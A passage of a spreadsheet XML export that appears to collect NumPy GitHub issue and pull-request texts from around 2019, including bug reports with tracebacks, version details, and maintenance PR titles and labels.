_x000D_
```python_x000D_
import numpy as np_x000D_
np.full(np.repeat(2, 64), 1, dtype=np.uint8)_x000D_
```_x000D_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```_x000D_
ValueError: sequence too large; cannot be greater than 32_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
```_x000D_
1.16.2 3.6.8 |Anaconda, Inc.| (default, Dec 30 2018, 01:22:34) _x000D_
[GCC 7.3.0] _x000D_
```_x000D_
Additional questions:_x000D_
_x000D_
* The [following line in NumPy source code](https://github.com/numpy/numpy/blob/b0a52b76c2bebe5c237722589d13bf02affa9c43/numpy/core/include/numpy/ndarraytypes.h#L30)_x000D_
_x000D_
```C_x000D_
#define NPY_MAXDIMS 32_x000D_
#define NPY_MAXARGS 32_x000D_
```_x000D_
Why are you limited to this number of dims (i.e., `32`)?_x000D_
_x000D_
* Is forking the library and allowing it to accept higher dims possible?, is it as simple as changing the aforementioned line?</t>
  </si>
  <si>
    <t xml:space="preserve">Sequence too large </t>
  </si>
  <si>
    <t xml:space="preserve">Need to deal with two errors when trying to determine the git commit of HEAD: if git is not found, check_output will raise an `OSError`, if the command fails because there is no git repo it will raise a `subprocess.SubprocessError`._x000D_
_x000D_
Fixes #13448 _x000D_
</t>
  </si>
  <si>
    <t>BUG: missing git raises an OSError</t>
  </si>
  <si>
    <t xml:space="preserve">See https://dev.azure.com/numpy/numpy/_build/results?buildId=3152. Probably related to the failing PR #13336. @mattip Could you take a look?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Azure no longer passes on 32 bit linux.</t>
  </si>
  <si>
    <t>Our license file contains additions to the standard BSD 3-clause license that make GitHub report it as "other". The GitHub license determination is automatic, and documented at https://help.github.com/en/articles/licensing-a-repository#detecting-a-license._x000D_
_x000D_
The advice there is to move complexity like licenses of vendored libraries to README or some other place._x000D_
_x000D_
Most vendored things are BSD, however not all. The main issue is `dragon4`, which is a custom non OSI-approved license. This is really not so helpful. On the PR that added it (gh-9941) there a note saying *Please check the license at the top of the dragon4.c file to confirm it is suitable.*. Apparently no one did. This was too hidden in the description, and should not have been merged without explicit review. A bit hard to do much about now ...._x000D_
_x000D_
Will look into what next._x000D_
_x000D_
The mention of Apache 2 is also not helpful, but we should be able to nuke that fairly easily I think, by modifying `scipy-sphinx-theme`.</t>
  </si>
  <si>
    <t>License not detected on repo, and some issues</t>
  </si>
  <si>
    <t>Replaces #6219 which opened with the comment_x000D_
"Adding a little bit of extra accounting in the inner loop allows joining the two specialized branches into a single one. The performance loss, if any, is within the measurement error."_x000D_
_x000D_
Additional comments were integrated into this PR, including a nice little compiler optimization for getting the quotient and remainder with a single divide (thanks [godbolt](https://godbolt.org/z/tP-qwq) )_x000D_
_x000D_
@seberg asked for a better error to be raised, which was already implemented._x000D_
_x000D_
I made a new PR since I could not push the rebase to @jaimefrio 's repo. Of course we only need one of these, @jaimefrio if you wish to move forward on it feel free to close this one.</t>
  </si>
  <si>
    <t>MANT: refactor unravel_index for code repetition</t>
  </si>
  <si>
    <t>Creates a single private implementation of the `PyArrayMultiIterObject`_x000D_
constructor, and calls it from the three existing public constructors._x000D_
_x000D_
Rebased #7441 off master and made a new PR since I could not push the rebase to @jaimefrio 's repo. Of course we only need one of these, @jaimefrio if you wish to move forward on it feel free to close this one.</t>
  </si>
  <si>
    <t>MAINT: refactor PyArrayMultiIterObject constructors</t>
  </si>
  <si>
    <t>Fixes #13437 _x000D_
_x000D_
Otherwise, the compiler may just put in `int f()` with an easily-missed warning and core devs may go through several debug cycles before realizing that a function prototype needs to be included._x000D_
_x000D_
Stackoverflow discussion re: it should be considered an error: https://stackoverflow.com/a/9182835/2942522</t>
  </si>
  <si>
    <t>BLD, TST: implicit func errors</t>
  </si>
  <si>
    <t xml:space="preserve">Hello!_x000D_
When I execute the line in python `import numpy` the following error occurs:_x000D_
_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
  File "/usr/local/lib/python3.5/dist-packages/numpy/core/__init__.py", line 40, in &lt;module&gt;_x000D_
    from . import multiarray_x000D_
  File "/usr/local/lib/python3.5/dist-packages/numpy/core/multiarray.py", line 12, in &lt;module&gt;_x000D_
    from . import overrides_x000D_
  File "/usr/local/lib/python3.5/dist-packages/numpy/core/overrides.py", line 6, in &lt;module&gt;_x000D_
    from numpy.core._multiarray_umath import (_x000D_
ImportError: /usr/local/lib/python3.5/dist-packages/numpy/core/_multiarray_umath.cpython-35m-arm-linux-gnueabihf.so: undefined symbol: cblas_sgemm_x000D_
_x000D_
During handling of the above exception, another exception occurred:_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;pyshell#1&gt;", line 1, in &lt;module&gt;_x000D_
    import numpy_x000D_
  File "/usr/local/lib/python3.5/dist-packages/numpy/__init__.py", line 142, in &lt;module&gt;_x000D_
    from . import core_x000D_
  File "/usr/local/lib/python3.5/dist-packages/numpy/core/__init__.py", line 71, in &lt;module&gt;_x000D_
    raise ImportError(msg)_x000D_
ImportError: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/usr/bin/python3),_x000D_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/usr/local/lib/python3.5/dist-packages/numpy/core/_multiarray_umath.cpython-35m-arm-linux-gnueabihf.so: undefined symbol: cblas_sgemm_x000D_
```_x000D_
_x000D_
I use Python 3.5 wich works on my Raspbian._x000D_
I reinstalled numpy and it still does not work. I also tried to install different versions of numpy and to install it according to this [guide](https://stackoverflow.com/questions/11443302/compiling-numpy-with-openblas-integration/14391693#14391693) and had no success._x000D_
</t>
  </si>
  <si>
    <t>numpy does not work</t>
  </si>
  <si>
    <t>MAINT: fixed typo 'wtihout' from numpy/core/shape_base.py</t>
  </si>
  <si>
    <t xml:space="preserve">this PR fixes #9538 </t>
  </si>
  <si>
    <t>BUG: fix unravel_index when dimension is greater than 'intp'</t>
  </si>
  <si>
    <t xml:space="preserve">If a structure type has no fields, equality throws_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; a = np.zeros(10, dtype=[])_x000D_
&gt;&gt;&gt; a == a_x000D_
ValueError: No fields found._x000D_
```_x000D_
_x000D_
---_x000D_
_x000D_
Original report:_x000D_
_x000D_
_x000D_
Test for equality of empty masked arrays raises an exception._x000D_
_x000D_
### Reproducing code example:_x000D_
```python_x000D_
In [1]: import sys, numpy; print(numpy.__version__, sys.version)_x000D_
1.16.3 3.6.1 (default, May 18 2017, 16:32:13) _x000D_
[GCC 4.2.1 Compatible Apple LLVM 8.1.0 (clang-802.0.42)]_x000D_
_x000D_
In [2]: a = numpy.ma.masked_array([], dtype=[], masked=False)  # or masked=True_x000D_
_x000D_
In [3]: a == None_x000D_
```_x000D_
### Error message:_x000D_
_x000D_
```python_x000D_
---------------------------------------------------------------------------_x000D_
ValueError                                Traceback (most recent call last)_x000D_
&lt;ipython-input-3-991e7ea0a64c&gt; in &lt;module&gt;_x000D_
----&gt; 1 a == None_x000D_
_x000D_
~/.../lib/python3.6/site-packages/numpy/ma/core.py in __eq__(self, other)_x000D_
   4043         and other considered equal only if both were fully masked._x000D_
   4044         """_x000D_
-&gt; 4045         return self._comparison(other, operator.eq)_x000D_
   4046 _x000D_
   4047     def __ne__(self, other):_x000D_
_x000D_
~/.../lib/python3.6/site-packages/numpy/ma/core.py in _comparison(self, other, compare)_x000D_
   3996             # Now take care of the mask; the merged mask should have an item_x000D_
   3997             # masked if all fields were masked (in one and/or other)._x000D_
-&gt; 3998             mask = (mask == np.ones((), mask.dtype))_x000D_
   3999 _x000D_
   4000         else:_x000D_
_x000D_
ValueError: No fields found._x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
1.16.3 3.6.1 (default, May 18 2017, 16:32:13) _x000D_
[GCC 4.2.1 Compatible Apple LLVM 8.1.0 (clang-802.0.42)]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Unable to test equality of structured dtypes with no fields</t>
  </si>
  <si>
    <t>See #10723 for related discussion, and the Travis logs [here](https://travis-ci.org/numpy/numpy/jobs/518651420) for an example by searching for `arraytypes.c.src`_x000D_
_x000D_
In short, `warning: implicit declaration of function` should probably be turned into a compiler error instead of just a warning. _x000D_
_x000D_
In this case, a C function was used before its prototype was included / available, which caused a substantial loss of core dev time due to debugging the strange behavior that ensued._x000D_
_x000D_
I think NumPy does have precedent for grepping through compiler warnings and erroring out on a selected subset of them. I believe this happens on some Travis CI runs, and perhaps that would be the most appropriate place for this for now._x000D_
_x000D_
I suspect there's probably some way to get gcc to swap that over to an error as well, but not sure we want to go down the rabbit hole of injecting more default compiler flags at this time.</t>
  </si>
  <si>
    <t>TST, BLD: implicit declaration warning -&gt; error</t>
  </si>
  <si>
    <t>['05 - Testing', 'component: build', 'good first issue']</t>
  </si>
  <si>
    <t xml:space="preserve">Add file-not-closed check in code analysis #9612 _x000D_
</t>
  </si>
  <si>
    <t>TST: Add file-not-closed check to LGTM analysis.</t>
  </si>
  <si>
    <t xml:space="preserve">In the code below, each call to np.arange leaks as one can see when running it. _x000D_
Happens in Python 3.6 and 3.7 (both Windows and Linux) but not in Python 2.7._x000D_
Numpy version is 1.16.3._x000D_
_x000D_
It seems that np.random.shuffle is involved, since when it is removed - the leak stops._x000D_
_x000D_
### Reproducing code example:_x000D_
import numpy as np_x000D_
from psutil import virtual_memory_x000D_
N = 1024 * 1024 * 128_x000D_
print("Initial free memory      :", virtual_memory().free)_x000D_
for i in range(10):_x000D_
    A = np.arange(N)_x000D_
    print("Free memory after arange :", virtual_memory().free)_x000D_
    np.random.shuffle(A)_x000D_
    print("Free memory after shuffle:", virtual_memory().free)_x000D_
_x000D_
### Numpy/Python version information: import sys, numpy; print(numpy.__version__, sys.version):_x000D_
1.16.3 3.6.3 (default, Oct  3 2017, 21:45:48) _x000D_
[GCC 7.2.0]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Memory Leak</t>
  </si>
  <si>
    <t>In NumPy 1.16.0, `np.load()` fails to load some files created by `np.save()`, saying "ValueError: invalid shape in fixed-type tuple."_x000D_
_x000D_
The problem seems to be that #12358 changed `np.lib.format._read_array_header()`.  It used to pass the descr to `np.dtype()`, but now it uses a new function `descr_to_dtype()` which fails for some valid inputs._x000D_
_x000D_
We have significant amounts of data stored on disk with formats which NumPy 1.16.0 cannot load, so this is a showstopper for upgrading beyond 1.15._x000D_
_x000D_
### Reproducing code example:_x000D_
This fails in NumPy 1.16.0, but works in all prior versions:_x000D_
```python_x000D_
import numpy as np_x000D_
a = np.zeros(1, np.dtype([('c', ('&lt;f8', (5,)), (2,))]))_x000D_
np.save('a.npy', a)_x000D_
np.load('a.npy')_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
  File "numpy/lib/npyio.py", line 440, in load_x000D_
    pickle_kwargs=pickle_kwargs)_x000D_
  File "numpy/lib/format.py", line 678, in read_array_x000D_
    shape, fortran_order, dtype = _read_array_header(fp, version)_x000D_
  File "numpy/lib/format.py", line 563, in _read_array_header_x000D_
    dtype = descr_to_dtype(d['descr'])_x000D_
  File "numpy/lib/format.py", line 282, in descr_to_dtype_x000D_
    dt = numpy.dtype((descr_to_dtype(descr_str), shape))_x000D_
  File "numpy/lib/format.py", line 282, in descr_to_dtype_x000D_
    dt = numpy.dtype((descr_to_dtype(descr_str), shape))_x000D_
ValueError: invalid shape in fixed-type tuple._x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
NumPy 1.16.0_x000D_
Python 3.6.6</t>
  </si>
  <si>
    <t>np.load() "invalid shape in fixed-type tuple" in NumPy 1.16.0</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
This problem is related to Cython, but given that it interacts with the initialization of NumPy's infrastructure, it might make sense to report here too (https://github.com/cython/cython/issues/2932)._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
Minimal Reproducible Example Requires Compilation: https://gist.github.com/mobiusklein/808d101ea228a71af02e9b5f4a8a0caa_x000D_
_x000D_
It was observed that using Python 2.7 on Linux with NumPy 1.16, invoking an unspecialized fused function where `np.ndarray` is in the fused type produces `RuntimeError: implement_array_function method already has a docstring`._x000D_
_x000D_
The gist includes the source code for building `numfoo`, and a short test script to demonstrate the behavior:_x000D_
_x000D_
```python_x000D_
import numfoo_x000D_
import numpy as np_x000D_
_x000D_
data = [1.2, 2.4]_x000D_
_x000D_
# The data are a plain list_x000D_
print(data)_x000D_
_x000D_
# Invoking the fused function explicitly with a list works_x000D_
print(numfoo.make_array[list](data))_x000D_
_x000D_
# convert it into a NumPy array_x000D_
data = np.array(data)_x000D_
_x000D_
# Invoking the fused function explicitly with an np.ndarray works_x000D_
print(numfoo.make_array[np.ndarray](data))_x000D_
_x000D_
# This fails_x000D_
print(numfoo.make_array(data))_x000D_
```_x000D_
This does not happen with an earlier NumPy version, it does not happen with a newer version of Python, and it does not appear to happen on Windows. That it blows up inside the fused function dispatch machinery but with seemingly an initialization-like problem in NumPy makes it hard to tell where I should be reporting this bug._x000D_
_x000D_
Note: Compilation was does using Cython 0.29.7_x000D_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/usr/lib/python2.7/site-packages/numpy/__init__.py in &lt;module&gt;()_x000D_
    140     from . import _distributor_init_x000D_
    141 _x000D_
--&gt; 142     from . import core_x000D_
    143     from .core import *_x000D_
    144     from . import compat_x000D_
_x000D_
/usr/lib/python2.7/site-packages/numpy/core/__init__.py in &lt;module&gt;()_x000D_
     38 _x000D_
     39 try:_x000D_
---&gt; 40     from . import multiarray_x000D_
     41 except ImportError as exc:_x000D_
     42     import sys_x000D_
_x000D_
/usr/lib/python2.7/site-packages/numpy/core/multiarray.py in &lt;module&gt;()_x000D_
     10 import warnings_x000D_
     11 _x000D_
---&gt; 12 from . import overrides_x000D_
     13 from . import _multiarray_umath_x000D_
     14 import numpy as np_x000D_
_x000D_
/usr/lib/python2.7/site-packages/numpy/core/overrides.py in &lt;module&gt;()_x000D_
     44     ------_x000D_
     45     TypeError : if no implementation is found._x000D_
---&gt; 46     """)_x000D_
     47 _x000D_
     48 _x000D_
```_x000D_
### Numpy/Python version information:_x000D_
_x000D_
Python: 2.7.13_x000D_
NumPy: 1.16.3_x000D_
Platform: Linux_x000D_
</t>
  </si>
  <si>
    <t>Error with fused function dispatch on Linux with Python 2.7 and NumPy 1.16.3</t>
  </si>
  <si>
    <t xml:space="preserve">I've been trying to clean up the warnings that are generated when SciPy is built, and I ran into this issue with f2py.  I'm using numpy 1.16.3._x000D_
_x000D_
In SciPy, we have a .pyf file that includes the following:_x000D_
_x000D_
```_x000D_
    subroutine idz_reconid(m,krank,col,n,list,proj,approx)_x000D_
      integer, intent(in), optional, depend(col) :: m = shape(col,0), krank = shape(col,1)_x000D_
      complex*16, intent(in) :: col(m,krank)_x000D_
      integer, intent(in), depend(list) :: n = len(list)_x000D_
      integer, intent(in) :: list(n)_x000D_
      complex*16, intent(in), depend(krank,n) :: proj(krank,n-krank)_x000D_
      complex*16, intent(out), depend(m,n) :: approx(m,n)_x000D_
    end subroutine idz_reconid_x000D_
```_x000D_
_x000D_
The corresponding Fortran function is_x000D_
_x000D_
```_x000D_
        subroutine idz_reconid(m,krank,col,n,list,proj,approx)_x000D_
        [...snip...]_x000D_
        implicit none_x000D_
        integer m,n,krank,j,k,l,list(n)_x000D_
```_x000D_
When the .pyf file is processed by f2py, it prints:_x000D_
_x000D_
    "object of type 'type' has no len()" in evaluating 'len(list)' (available names: [])_x000D_
_x000D_
but as far as I know, the generated wrappers work (we've been using them for quite a while)._x000D_
_x000D_
The message is generated by the function [`_eval_scalar`](https://github.com/numpy/numpy/blob/c23bd98de665733dd090636f38b6aacf9f99450b/numpy/f2py/crackfortran.py#L2510) in 'crackfortran.py', when the argument `value` is `len(list)`:_x000D_
_x000D_
```_x000D_
def _eval_scalar(value, params):_x000D_
    if _is_kind_number(value):_x000D_
        value = value.split('_')[0]_x000D_
    try:_x000D_
        value = str(eval(value, {}, params))_x000D_
    except (NameError, SyntaxError):_x000D_
        return value_x000D_
    except Exception as msg:_x000D_
        errmess('"%s" in evaluating %r '_x000D_
                '(available names: %s)\n'_x000D_
                % (msg, value, list(params.keys())))_x000D_
    return value_x000D_
```_x000D_
When `value` is `"len(list)"`, `eval(value, {}, params)` raises `TypeError: object of type 'type' has no len()`, which is not caught by the first `except` clause.  Instead, the `errmess()` function is called with the underlying error message from the exception included in the output._x000D_
_x000D_
I don't know why the code chooses to print this when a TypeError is raised, but not when a NameError or SyntaxError is raised.  That's the only difference in behavior when the `eval()` call results in an error.  In either case, the original `value` is returned._x000D_
_x000D_
@pearu, any ideas?  Is there any harm in also including TypeError with the ones that don't print a message?_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>f2py: Error message when `list` is a Fortran functon argument.</t>
  </si>
  <si>
    <t>['component: numpy.f2py']</t>
  </si>
  <si>
    <t xml:space="preserve">Recently I've upgraded my system to iMac Pro, which has Skylake CPU and one of the test started to fail. _x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; from numpy import array_x000D_
&gt;&gt;&gt; x = array([1.,2.,3.,4.])_x000D_
&gt;&gt;&gt; x.dot(x)_x000D_
Illegal instruction_x000D_
```_x000D_
_x000D_
Now, more detailed log:_x000D_
_x000D_
```sh_x000D_
$ docker run -it --rm alpine:3.9_x000D_
/ # apk add python3 py3-numpy_x000D_
fetch http://dl-cdn.alpinelinux.org/alpine/v3.9/main/x86_64/APKINDEX.tar.gz_x000D_
fetch http://dl-cdn.alpinelinux.org/alpine/v3.9/community/x86_64/APKINDEX.tar.gz_x000D_
(1/16) Installing libgcc (8.3.0-r0)_x000D_
(2/16) Installing libquadmath (8.3.0-r0)_x000D_
(3/16) Installing libgfortran (8.3.0-r0)_x000D_
(4/16) Installing openblas (0.3.3-r2)_x000D_
(5/16) Installing libbz2 (1.0.6-r6)_x000D_
(6/16) Installing expat (2.2.6-r0)_x000D_
(7/16) Installing libffi (3.2.1-r6)_x000D_
(8/16) Installing gdbm (1.13-r1)_x000D_
(9/16) Installing xz-libs (5.2.4-r0)_x000D_
(10/16) Installing ncurses-terminfo-base (6.1_p20190105-r0)_x000D_
(11/16) Installing ncurses-terminfo (6.1_p20190105-r0)_x000D_
(12/16) Installing ncurses-libs (6.1_p20190105-r0)_x000D_
(13/16) Installing readline (7.0.003-r1)_x000D_
(14/16) Installing sqlite-libs (3.26.0-r3)_x000D_
(15/16) Installing python3 (3.6.8-r2)_x000D_
(16/16) Installing py3-numpy (1.15.4-r0)_x000D_
Executing busybox-1.29.3-r10.trigger_x000D_
OK: 108 MiB in 30 packages_x000D_
/ # python3_x000D_
Python 3.6.8 (default, Apr  8 2019, 18:17:52)_x000D_
[GCC 8.3.0] on linux_x000D_
Type "help", "copyright", "credits" or "license" for more information._x000D_
&gt;&gt;&gt; from numpy import array_x000D_
&gt;&gt;&gt; x = array([1.,2.,3.,4.])_x000D_
&gt;&gt;&gt; x.dot(x)_x000D_
Illegal instruction_x000D_
```_x000D_
_x000D_
I've tried to upgrade numpy to the latest version, and still see the problem._x000D_
_x000D_
This might be related to the xianyi/openblas#1947._x000D_
_x000D_
Possible workaround, is to set `OPENBLAS_CORETYPE` environmental variable to `haswell` prior to starting Python:_x000D_
_x000D_
```python_x000D_
/ # export OPENBLAS_CORETYPE=haswell_x000D_
/ # python3_x000D_
Python 3.6.8 (default, Apr  8 2019, 18:17:52)_x000D_
[GCC 8.3.0] on linux_x000D_
Type "help", "copyright", "credits" or "license" for more information._x000D_
&gt;&gt;&gt; from numpy import array_x000D_
Core: Haswell_x000D_
&gt;&gt;&gt; x = array([1.,2.,3.,4.])_x000D_
&gt;&gt;&gt; x.dot(x)_x000D_
30.0_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>Illegal instruction in dot</t>
  </si>
  <si>
    <t>DLL load failed</t>
  </si>
  <si>
    <t xml:space="preserve">TST: Check use of out parameter in clip() </t>
  </si>
  <si>
    <t>It would be nice if numpy had something like tensorflow's tf.one_hot._x000D_
I've seen enough implementations to see that most people implement it very naively.</t>
  </si>
  <si>
    <t xml:space="preserve"> Feature request: Add one_hot function</t>
  </si>
  <si>
    <t>['01 - Enhancement', '23 - Wish List', '54 - Needs decision']</t>
  </si>
  <si>
    <t>This is a minor documentation fix that I noticed when reading the reference docs for `ndarray`. Size 0 dimensions are valid, if somewhat rare.</t>
  </si>
  <si>
    <t>DOC: dimension sizes are non-negative, not positive</t>
  </si>
  <si>
    <t xml:space="preserve">Continuing #13136, document the existance of solutions to control the number of threads used by the linalg backends. Since I couldn't find any documentation of backends, I added a short description to the index of `linalg` as well._x000D_
_x000D_
xref #9312 which began linking in the documentation of `show_config` </t>
  </si>
  <si>
    <t>DOC: document existence of linalg backends</t>
  </si>
  <si>
    <t>Hi, when I build numpy 1.16.3 in Fedora with Python 3.8.0a3,_x000D_
I get the following test failures with `DeprecationWarning: an integer is required (got type float).  Implicit conversion to integers using __int__ is deprecated, and may be removed in a future version of Python.`_x000D_
_x000D_
On https://github.com/numpy/numpy/blob/08b17aee272fb3f64bb0e5e96e0376c0f9fd9424/numpy/random/mtrand/mtrand.pyx#L3800_x000D_
_x000D_
And https://github.com/numpy/numpy/blob/08b17aee272fb3f64bb0e5e96e0376c0f9fd9424/numpy/random/mtrand/mtrand.pyx#L4267-L4269_x000D_
_x000D_
&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```console_x000D_
$ python3.8 -m pytest -v --pyargs numpy -k 'not big_arrays and not large_archive and not test_highest_available_pickle_protocol'_x000D_
# the deselects are not important, just having them here for completeness _x000D_
```_x000D_
_x000D_
&lt;details&gt;_x000D_
_x000D_
### Error message:_x000D_
_x000D_
```_x000D_
=================================== FAILURES ===================================_x000D_
_________________________ TestRandomDist.test_binomial __________________________x000D_
_x000D_
self = &lt;numpy.random.tests.test_random.TestRandomDist object at 0x7fc7b7bc2df0&gt;_x000D_
_x000D_
    def test_binomial(self):_x000D_
        np.random.seed(self.seed)_x000D_
&gt;       actual = np.random.binomial(100.123, .456, size=(3, 2))_x000D_
_x000D_
self       = &lt;numpy.random.tests.test_random.TestRandomDist object at 0x7fc7b7bc2df0&gt;_x000D_
_x000D_
../../../BUILDROOT/numpy-1.16.3-1.fc31.x86_64/usr/lib64/python3.8/site-packages/numpy/random/tests/test_random.py:518: _x000D_
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _x000D_
_x000D_
&gt;   ???_x000D_
E   DeprecationWarning: an integer is required (got type float).  Implicit conversion to integers using __int__ is deprecated, and may be removed in a future version of Python._x000D_
_x000D_
Lock       = &lt;built-in function allocate_lock&gt;_x000D_
RandomState = &lt;class 'mtrand.RandomState'&gt;_x000D_
__builtins__ = &lt;builtins&gt;_x000D_
__doc__    = None_x000D_
__file__   = '/builddir/build/BUILDROOT/numpy-1.16.3-1.fc31.x86_64/usr/lib64/python3.8/site-packages/numpy/random/mtrand.cpython-38m-x86_64-linux-gnu.so'_x000D_
__loader__ = &lt;_frozen_importlib_external.ExtensionFileLoader object at 0x7fc7c4486760&gt;_x000D_
__name__   = 'numpy.random.mtrand'_x000D_
__package__ = 'numpy.random'_x000D_
__path__   = None_x000D_
__spec__   = ModuleSpec(name='numpy.random.mtrand', loader=&lt;_frozen_importlib_external.ExtensionFileLoader object at 0x7fc7c4486760...ROOT/numpy-1.16.3-1.fc31.x86_64/usr/lib64/python3.8/site-packages/numpy/random/mtrand.cpython-38m-x86_64-linux-gnu.so')_x000D_
__test__   = {'RandomState.binomial (line 3706)': '\n        binomial(n, p, size=None)\n\n        Draw samples from a binomial dist...0.3])\n        array(['pooh', 'pooh', 'pooh', 'Christopher', 'piglet'],\n              dtype='|S11')\n\n        ", ...}_x000D_
_rand      = &lt;mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
_rand_bool = &lt;built-in function _rand_bool&gt;_x000D_
_rand_int16 = &lt;built-in function _rand_int16&gt;_x000D_
_rand_int32 = &lt;built-in function _rand_int32&gt;_x000D_
_rand_int64 = &lt;built-in function _rand_int64&gt;_x000D_
_rand_int8 = &lt;built-in function _rand_int8&gt;_x000D_
_rand_uint16 = &lt;built-in function _rand_uint16&gt;_x000D_
_rand_uint32 = &lt;built-in function _rand_uint32&gt;_x000D_
_rand_uint64 = &lt;built-in function _rand_uint64&gt;_x000D_
_rand_uint8 = &lt;built-in function _rand_uint8&gt;_x000D_
_randint_type = {dtype('bool'): (0, 2, &lt;built-in function _rand_bool&gt;), dtype('int8'): (-128, 128, &lt;built-in function _rand_int8&gt;), dt...t8'): (0, 256, &lt;built-in function _rand_uint8&gt;), dtype('int16'): (-32768, 32768, &lt;built-in function _rand_int16&gt;), ...}_x000D_
_shape_from_size = &lt;built-in function _shape_from_size&gt;_x000D_
beta       = &lt;built-in method beta of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
binomial   = &lt;built-in method binomial of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
bytes      = &lt;built-in method bytes of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
chisquare  = &lt;built-in method chisquare of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
choice     = &lt;built-in method choice of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
dirichlet  = &lt;built-in method dirichlet of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
exponential = &lt;built-in method exponential of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
f          = &lt;built-in method f of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
gamma      = &lt;built-in method gamma of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
geometric  = &lt;built-in method geometric of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
get_state  = &lt;built-in method get_state of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
gumbel     = &lt;built-in method gumbel of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
hypergeometric = &lt;built-in method hypergeometric of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
laplace    = &lt;built-in method laplace of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
logistic   = &lt;built-in method logistic of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
lognormal  = &lt;built-in method lognormal of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
logseries  = &lt;built-in method logseries of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
multinomial = &lt;built-in method multinomial of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
multivariate_normal = &lt;built-in method multivariate_normal of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
negative_binomial = &lt;built-in method negative_binomial of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
noncentral_chisquare = &lt;built-in method noncentral_chisquare of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
noncentral_f = &lt;built-in method noncentral_f of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
normal     = &lt;built-in method normal of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
np         = &lt;module 'numpy' from '/builddir/build/BUILDROOT/numpy-1.16.3-1.fc31.x86_64/usr/lib64/python3.8/site-packages/numpy/__init__.py'&gt;_x000D_
operator   = &lt;module 'operator' from '/usr/lib64/python3.8/operator.py'&gt;_x000D_
pareto     = &lt;built-in method pareto of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
permutation = &lt;built-in method permutation of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
poisson    = &lt;built-in method poisson of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
power      = &lt;built-in method power of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
rand       = &lt;built-in method rand of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
randint    = &lt;built-in method randint of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
randn      = &lt;built-in method randn of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
random_integers = &lt;built-in method random_integers of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
random_sample = &lt;built-in method random_sample of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
rayleigh   = &lt;built-in method rayleigh of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
seed       = &lt;built-in method seed of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
set_state  = &lt;built-in method set_state of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
shuffle    = &lt;built-in method shuffle of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
standard_cauchy = &lt;built-in method standard_cauchy of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
standard_exponential = &lt;built-in method standard_exponential of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
standard_gamma = &lt;built-in method standard_gamma of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
standard_normal = &lt;built-in method standard_normal of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
standard_t = &lt;built-in method standard_t of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
triangular = &lt;built-in method triangular of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
uniform    = &lt;built-in method uniform of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
vonmises   = &lt;built-in method vonmises of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
wald       = &lt;built-in method wald of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
warnings   = &lt;module 'warnings' from '/usr/lib64/python3.8/warnings.py'&gt;_x000D_
